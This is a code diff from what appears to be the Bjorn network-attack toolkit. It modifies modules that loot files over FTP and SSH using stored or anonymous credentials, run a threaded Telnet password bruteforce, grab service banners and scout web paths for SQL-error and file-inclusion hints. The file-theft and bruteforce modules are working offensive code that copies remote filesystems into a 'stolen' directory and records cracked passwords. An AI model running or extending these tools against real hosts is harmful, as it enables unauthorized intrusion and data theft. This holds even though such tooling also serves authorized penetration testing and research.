files: List[str] = []
if depth > self._MAX_DEPTH:
logger.debug(f"Max recursion depth reached at {dir_path}")
return []
try:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
@@ -136,7 +144,7 @@ class StealFilesFTP:
try:
ftp.cwd(item) # if ok -> directory
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
files.extend(self.find_files(ftp, os.path.join(dir_path, item), depth + 1))
ftp.cwd('..')
except Exception:
# not a dir => file candidate
@@ -146,11 +154,19 @@ class StealFilesFTP:
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"FTP path error {dir_path}: {e}")
raise
return files
def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
try:
# Check file size before downloading
try:
size = ftp.size(remote_file)
if size is not None and size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # SIZE not supported, try download anyway
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
@@ -161,6 +177,7 @@ class StealFilesFTP:
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
timer = None
try:
self.shared_data.bjorn_orch_status = b_class
try:
@@ -168,11 +185,14 @@ class StealFilesFTP:
except Exception:
port_i = b_port
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
def try_anonymous() -> Optional[FTP]:
return self.connect_ftp(ip, 'anonymous', '')
return self.connect_ftp(ip, 'anonymous', '', port=port_i)
if not creds and not try_anonymous():
logger.error(f"No FTP credentials for {ip}. Skipping.")
@@ -192,9 +212,11 @@ class StealFilesFTP:
# Anonymous first
ftp = try_anonymous()
if ftp:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname}
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
if files:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
@@ -207,7 +229,6 @@ class StealFilesFTP:
except Exception:
pass
if success:
timer.cancel()
return 'success'
# Authenticated creds
@@ -216,13 +237,15 @@ class StealFilesFTP:
logger.info("Execution interrupted.")
break
try:
logger.info(f"Trying FTP {username}:{password} @ {ip}")
ftp = self.connect_ftp(ip, username, password)
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying FTP {username} @ {ip}:{port_i}")
ftp = self.connect_ftp(ip, username, password, port=port_i)
if not ftp:
continue
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
@@ -235,14 +258,15 @@ class StealFilesFTP:
except Exception:
pass
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"FTP loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
finally:
if timer:
timer.cancel()

View File

@@ -218,23 +218,41 @@ class StealFilesSSH:
logger.info(f"Found {len(matches)} matching files in {dir_path}")
return matches
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
"""
Download a single remote file into the given local dir, preserving subdirs.
Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
"""
sftp = ssh.open_sftp()
self.sftp_connected = True # first time we open SFTP, mark as connected
# Preserve partial directory structure under local_dir
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
try:
# Check file size before downloading
try:
st = sftp.stat(remote_file)
if st.st_size and st.st_size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # stat failed, try download anyway
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
sftp.close()
# Preserve partial directory structure under local_dir
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
finally:
try:
sftp.close()
except Exception:
pass
# --------------------- Orchestrator entrypoint ---------------------
@@ -247,6 +265,7 @@ class StealFilesSSH:
- status_key: action name (b_class)
Returns 'success' if at least one file stolen; else 'failed'.
"""
timer = None
try:
self.shared_data.bjorn_orch_status = b_class
@@ -256,6 +275,9 @@ class StealFilesSSH:
except Exception:
port_i = b_port
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
if not creds:
@@ -283,12 +305,14 @@ class StealFilesSSH:
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying credential {username} for {ip}")
ssh = self.connect_ssh(ip, username, password, port=port_i)
# Search from root; filtered by config
files = self.find_files(ssh, '/')
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted during download.")
@@ -310,12 +334,14 @@ class StealFilesSSH:
# Stay quiet on Paramiko internals; just log the reason and try next cred
logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")
timer.cancel()
return 'success' if success_any else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
finally:
if timer:
timer.cancel()
if __name__ == "__main__":

View File

@@ -1,9 +1,9 @@
"""
telnet_bruteforce.py Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur
"""
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='telnet')
- Conserve la logique dorigine (telnetlib, queue/threads)
- Succès -> DB.creds (service='telnet')
- Conserve la logique d’origine (telnetlib, queue/threads)
"""
import os
@@ -15,6 +15,7 @@ from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
@@ -43,20 +44,21 @@ class TelnetBruteforce:
return self.telnet_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""Gère les tentatives Telnet, persistance DB, mapping IP(MAC, Hostname)."""
"""Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
@@ -67,6 +69,7 @@ class TelnetConnector:
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
@@ -110,9 +113,10 @@ class TelnetConnector:
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- Telnet ----------
def telnet_connect(self, adresse_ip: str, user: str, password: str) -> bool:
def telnet_connect(self, adresse_ip: str, user: str, password: str, port: int = 23, timeout: int = 10) -> bool:
timeout = int(getattr(self.shared_data, "telnet_connect_timeout_s", timeout))
try:
tn = telnetlib.Telnet(adresse_ip)
tn = telnetlib.Telnet(adresse_ip, port=port, timeout=timeout)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
@@ -175,14 +179,17 @@ class TelnetConnector:
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.telnet_connect(adresse_ip, user, password):
if self.telnet_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
@@ -191,46 +198,54 @@ class TelnetConnector:
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.queue.join()
for t in threads:
t.join()
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
return success_flag[0], self.results
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"Telnet dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
@@ -270,3 +285,4 @@ if __name__ == "__main__":
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,214 +1,191 @@
# Service fingerprinting and version detection tool for vulnerability identification.
# Saves settings in `/home/bjorn/.settings_bjorn/thor_hammer_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target Target IP or hostname to scan (overrides saved value).
# -p, --ports Ports to scan (default: common ports, comma-separated).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/services).
# -d, --delay Delay between probes in seconds (default: 1).
# -v, --verbose Enable verbose output for detailed service information.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).
What it does:
- For a given target (ip, port), tries a fast TCP connect + banner grab.
- Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
Notes:
- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
"""
import os
import json
import socket
import argparse
import threading
from datetime import datetime
import logging
from concurrent.futures import ThreadPoolExecutor
import subprocess
import socket
import time
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="thor_hammer.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ThorHammer"
b_module = "thor_hammer"
b_status = "ThorHammer"
b_port = None
b_parent = None
b_service = '["ssh","ftp","telnet","http","https","smb","mysql","postgres","mssql","rdp","vnc"]'
b_trigger = "on_port_change"
b_priority = 35
b_action = "normal"
b_cooldown = 1200
b_rate_limit = "24/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
def _guess_service_from_port(port: int) -> str:
mapping = {
21: "ftp",
22: "ssh",
23: "telnet",
25: "smtp",
53: "dns",
80: "http",
110: "pop3",
139: "netbios-ssn",
143: "imap",
443: "https",
445: "smb",
1433: "mssql",
3306: "mysql",
3389: "rdp",
5432: "postgres",
5900: "vnc",
8080: "http",
}
return mapping.get(int(port), "")
b_class = "ThorHammer"
b_module = "thor_hammer"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/services"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "thor_hammer_settings.json")
DEFAULT_PORTS = [21, 22, 23, 25, 53, 80, 110, 115, 139, 143, 194, 443, 445, 1433, 3306, 3389, 5432, 5900, 8080]
# Service signature database
SERVICE_SIGNATURES = {
21: {
'name': 'FTP',
'vulnerabilities': {
'vsftpd 2.3.4': 'Backdoor command execution',
'ProFTPD 1.3.3c': 'Remote code execution'
}
},
22: {
'name': 'SSH',
'vulnerabilities': {
'OpenSSH 5.3': 'Username enumeration',
'OpenSSH 7.2p1': 'User enumeration timing attack'
}
},
# Add more signatures as needed
}
class ThorHammer:
def __init__(self, target, ports=None, output_dir=DEFAULT_OUTPUT_DIR, delay=1, verbose=False):
self.target = target
self.ports = ports or DEFAULT_PORTS
self.output_dir = output_dir
self.delay = delay
self.verbose = verbose
self.results = {
'target': target,
'timestamp': datetime.now().isoformat(),
'services': {}
}
self.lock = threading.Lock()
def __init__(self, shared_data):
self.shared_data = shared_data
def probe_service(self, port):
"""Probe a specific port for service information."""
def _connect_and_banner(self, ip: str, port: int, timeout_s: float, max_bytes: int) -> Tuple[bool, str]:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout_s)
try:
# Initial connection test
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.delay)
result = sock.connect_ex((self.target, port))
if result == 0:
service_info = {
'port': port,
'state': 'open',
'service': None,
'version': None,
'vulnerabilities': []
if s.connect_ex((ip, int(port))) != 0:
return False, ""
try:
data = s.recv(max_bytes)
banner = (data or b"").decode("utf-8", errors="ignore").strip()
except Exception:
banner = ""
return True, banner
finally:
try:
s.close()
except Exception:
pass
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else None
except Exception:
port_i = None
# If port is missing, try to infer from row 'Ports' and fingerprint a few.
ports_to_check = []
if port_i:
ports_to_check = [port_i]
else:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for p in ports_txt.split(";"):
p = p.strip()
if p.isdigit():
ports_to_check.append(int(p))
ports_to_check = ports_to_check[:12] # Pi Zero guard
if not ports_to_check:
return "failed"
timeout_s = float(getattr(self.shared_data, "thor_connect_timeout_s", 1.5))
max_bytes = int(getattr(self.shared_data, "thor_banner_max_bytes", 1024))
source = str(getattr(self.shared_data, "thor_source", "thor_hammer"))
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
self.shared_data.bjorn_orch_status = "ThorHammer"
self.shared_data.bjorn_status_text2 = ip
self.shared_data.comment_params = {"ip": ip, "port": str(ports_to_check[0])}
progress = ProgressTracker(self.shared_data, len(ports_to_check))
try:
any_open = False
for p in ports_to_check:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
ok, banner = self._connect_and_banner(ip, p, timeout_s=timeout_s, max_bytes=max_bytes)
any_open = any_open or ok
service = _guess_service_from_port(p)
product = ""
version = ""
fingerprint = banner[:200] if banner else ""
confidence = 0.4 if ok else 0.1
state = "open" if ok else "closed"
self.shared_data.comment_params = {
"ip": ip,
"port": str(p),
"open": str(int(ok)),
"svc": service or "?",
}
# Get service banner
# Persist to DB if method exists.
try:
banner = sock.recv(1024).decode('utf-8', errors='ignore').strip()
service_info['banner'] = banner
except:
service_info['banner'] = None
if hasattr(self.shared_data, "db") and hasattr(self.shared_data.db, "upsert_port_service"):
self.shared_data.db.upsert_port_service(
mac_address=mac or "",
ip=ip,
port=int(p),
protocol="tcp",
state=state,
service=service or None,
product=product or None,
version=version or None,
banner=banner or None,
fingerprint=fingerprint or None,
confidence=float(confidence),
source=source,
)
except Exception as e:
logger.error(f"DB upsert_port_service failed for {ip}:{p}: {e}")
# Advanced service detection using nmap if available
try:
nmap_output = subprocess.check_output(
['nmap', '-sV', '-p', str(port), '-T4', self.target],
stderr=subprocess.DEVNULL
).decode()
# Parse nmap output
for line in nmap_output.split('\n'):
if str(port) in line and 'open' in line:
service_info['service'] = line.split()[2]
if len(line.split()) > 3:
service_info['version'] = ' '.join(line.split()[3:])
except:
pass
progress.advance(1)
# Check for known vulnerabilities
if port in SERVICE_SIGNATURES:
sig = SERVICE_SIGNATURES[port]
service_info['service'] = service_info['service'] or sig['name']
if service_info['version']:
for vuln_version, vuln_desc in sig['vulnerabilities'].items():
if vuln_version.lower() in service_info['version'].lower():
service_info['vulnerabilities'].append({
'version': vuln_version,
'description': vuln_desc
})
progress.set_complete()
return "success" if any_open else "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
with self.lock:
self.results['services'][port] = service_info
if self.verbose:
logging.info(f"Service detected on port {port}: {service_info['service']}")
sock.close()
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
except Exception as e:
logging.error(f"Error probing port {port}: {e}")
def save_results(self):
"""Save scan results to a JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(self.output_dir, f"service_scan_{timestamp}.json")
with open(filename, 'w') as f:
json.dump(self.results, f, indent=4)
logging.info(f"Results saved to {filename}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the service scanning and fingerprinting process."""
logging.info(f"Starting service scan on {self.target}")
with ThreadPoolExecutor(max_workers=10) as executor:
executor.map(self.probe_service, self.ports)
self.save_results()
return self.results
def save_settings(target, ports, output_dir, delay, verbose):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"ports": ports,
"output_dir": output_dir,
"delay": delay,
"verbose": verbose
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Service fingerprinting and vulnerability detection tool")
parser.add_argument("-t", "--target", help="Target IP or hostname")
parser.add_argument("-p", "--ports", help="Ports to scan (comma-separated)")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-d", "--delay", type=float, default=1, help="Delay between probes")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
parser = argparse.ArgumentParser(description="ThorHammer (service fingerprint)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="22")
args = parser.parse_args()
settings = load_settings()
target = args.target or settings.get("target")
ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
output_dir = args.output or settings.get("output_dir")
delay = args.delay or settings.get("delay")
verbose = args.verbose or settings.get("verbose")
sd = SharedData()
act = ThorHammer(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": "", "Ports": args.port}
print(act.execute(args.ip, args.port, row, "ThorHammer"))
if not target:
logging.error("Target is required. Use -t or save it in settings")
return
save_settings(target, ports, output_dir, delay, verbose)
scanner = ThorHammer(
target=target,
ports=ports,
output_dir=output_dir,
delay=delay,
verbose=verbose
)
scanner.execute()
if __name__ == "__main__":
main()

View File

@@ -1,313 +1,396 @@
# Web application scanner for discovering hidden paths and vulnerabilities.
# Saves settings in `/home/bjorn/.settings_bjorn/valkyrie_scout_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -u, --url Target URL to scan (overrides saved value).
# -w, --wordlist Path to directory wordlist (default: built-in list).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/webscan).
# -t, --threads Number of concurrent threads (default: 10).
# -d, --delay Delay between requests in seconds (default: 0.1).
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).
What it does:
- Probes a small set of common web paths on a target (ip, port).
- Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
error/debug strings). No exploitation, no bruteforce.
- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import os
import json
import requests
import argparse
from datetime import datetime
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urljoin
import re
from bs4 import BeautifulSoup
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="valkyrie_scout.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ValkyrieScout"
b_module = "valkyrie_scout"
b_status = "ValkyrieScout"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 50
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "8/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
# Small default list to keep the action cheap on Pi Zero.
DEFAULT_PATHS = [
"/",
"/robots.txt",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
]
# Keep patterns minimal and high-signal.
SQLI_ERRORS = [
"error in your sql syntax",
"mysql_fetch",
"unclosed quotation mark",
"ora-",
"postgresql",
"sqlite error",
]
LFI_HINTS = [
"include(",
"require(",
"include_once(",
"require_once(",
]
DEBUG_HINTS = [
"stack trace",
"traceback",
"exception",
"fatal error",
"notice:",
"warning:",
"debug",
]
b_class = "ValkyrieScout"
b_module = "valkyrie_scout"
b_enabled = 0
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/webscan"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "valkyrie_scout_settings.json")
# Common web vulnerabilities to check
VULNERABILITY_PATTERNS = {
'sql_injection': [
"error in your SQL syntax",
"mysql_fetch_array",
"ORA-",
"PostgreSQL",
],
'xss': [
"<script>alert(1)</script>",
"javascript:alert(1)",
],
'lfi': [
"include(",
"require(",
"include_once(",
"require_once(",
]
}
class ValkyieScout:
def __init__(self, url, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, delay=0.1):
self.base_url = url.rstrip('/')
self.wordlist = wordlist
self.output_dir = output_dir
self.threads = threads
self.delay = delay
self.discovered_paths = set()
self.vulnerabilities = []
self.forms = []
self.session = requests.Session()
self.session.headers = {
'User-Agent': 'Valkyrie Scout Web Scanner',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
}
self.lock = threading.Lock()
def load_wordlist(self):
"""Load directory wordlist."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r') as f:
return [line.strip() for line in f if line.strip()]
return [
'admin', 'wp-admin', 'administrator', 'login', 'wp-login.php',
'upload', 'uploads', 'backup', 'backups', 'config', 'configuration',
'dev', 'development', 'test', 'testing', 'staging', 'prod',
'api', 'v1', 'v2', 'beta', 'debug', 'console', 'phpmyadmin',
'mysql', 'database', 'db', 'wp-content', 'includes', 'tmp', 'temp'
]
def scan_path(self, path):
"""Scan a single path for existence and vulnerabilities."""
url = urljoin(self.base_url, path)
try:
response = self.session.get(url, allow_redirects=False)
if response.status_code in [200, 301, 302, 403]:
with self.lock:
self.discovered_paths.add({
'path': path,
'url': url,
'status_code': response.status_code,
'content_length': len(response.content),
'timestamp': datetime.now().isoformat()
})
# Scan for vulnerabilities
self.check_vulnerabilities(url, response)
# Extract and analyze forms
self.analyze_forms(url, response)
except Exception as e:
logging.error(f"Error scanning {url}: {e}")
def check_vulnerabilities(self, url, response):
"""Check for common vulnerabilities in the response."""
try:
content = response.text.lower()
for vuln_type, patterns in VULNERABILITY_PATTERNS.items():
for pattern in patterns:
if pattern.lower() in content:
with self.lock:
self.vulnerabilities.append({
'type': vuln_type,
'url': url,
'pattern': pattern,
'timestamp': datetime.now().isoformat()
})
# Additional checks
self.check_security_headers(url, response)
self.check_information_disclosure(url, response)
except Exception as e:
logging.error(f"Error checking vulnerabilities for {url}: {e}")
def analyze_forms(self, url, response):
"""Analyze HTML forms for potential vulnerabilities."""
try:
soup = BeautifulSoup(response.text, 'html.parser')
forms = soup.find_all('form')
for form in forms:
form_data = {
'url': url,
'method': form.get('method', 'get').lower(),
'action': urljoin(url, form.get('action', '')),
'inputs': [],
'timestamp': datetime.now().isoformat()
}
# Analyze form inputs
for input_field in form.find_all(['input', 'textarea']):
input_data = {
'type': input_field.get('type', 'text'),
'name': input_field.get('name', ''),
'id': input_field.get('id', ''),
'required': input_field.get('required') is not None
}
form_data['inputs'].append(input_data)
with self.lock:
self.forms.append(form_data)
except Exception as e:
logging.error(f"Error analyzing forms in {url}: {e}")
def check_security_headers(self, url, response):
"""Check for missing or misconfigured security headers."""
security_headers = {
'X-Frame-Options': 'Missing X-Frame-Options header',
'X-XSS-Protection': 'Missing X-XSS-Protection header',
'X-Content-Type-Options': 'Missing X-Content-Type-Options header',
'Strict-Transport-Security': 'Missing HSTS header',
'Content-Security-Policy': 'Missing Content-Security-Policy'
}
for header, message in security_headers.items():
if header not in response.headers:
with self.lock:
self.vulnerabilities.append({
'type': 'missing_security_header',
'url': url,
'detail': message,
'timestamp': datetime.now().isoformat()
})
def check_information_disclosure(self, url, response):
"""Check for information disclosure in response."""
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'internal_ip': r'\b(?:192\.168|10\.|172\.(?:1[6-9]|2[0-9]|3[01]))\.\d{1,3}\.\d{1,3}\b',
'debug_info': r'(?:stack trace|debug|error|exception)',
'version_info': r'(?:version|powered by|built with)'
}
content = response.text.lower()
for info_type, pattern in patterns.items():
matches = re.findall(pattern, content, re.IGNORECASE)
if matches:
with self.lock:
self.vulnerabilities.append({
'type': 'information_disclosure',
'url': url,
'info_type': info_type,
'findings': matches,
'timestamp': datetime.now().isoformat()
})
def save_results(self):
"""Save scan results to JSON files."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
# Save discovered paths
if self.discovered_paths:
paths_file = os.path.join(self.output_dir, f"paths_{timestamp}.json")
with open(paths_file, 'w') as f:
json.dump(list(self.discovered_paths), f, indent=4)
# Save vulnerabilities
if self.vulnerabilities:
vulns_file = os.path.join(self.output_dir, f"vulnerabilities_{timestamp}.json")
with open(vulns_file, 'w') as f:
json.dump(self.vulnerabilities, f, indent=4)
# Save form analysis
if self.forms:
forms_file = os.path.join(self.output_dir, f"forms_{timestamp}.json")
with open(forms_file, 'w') as f:
json.dump(self.forms, f, indent=4)
logging.info(f"Results saved to {self.output_dir}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the web application scan."""
try:
logging.info(f"Starting web scan on {self.base_url}")
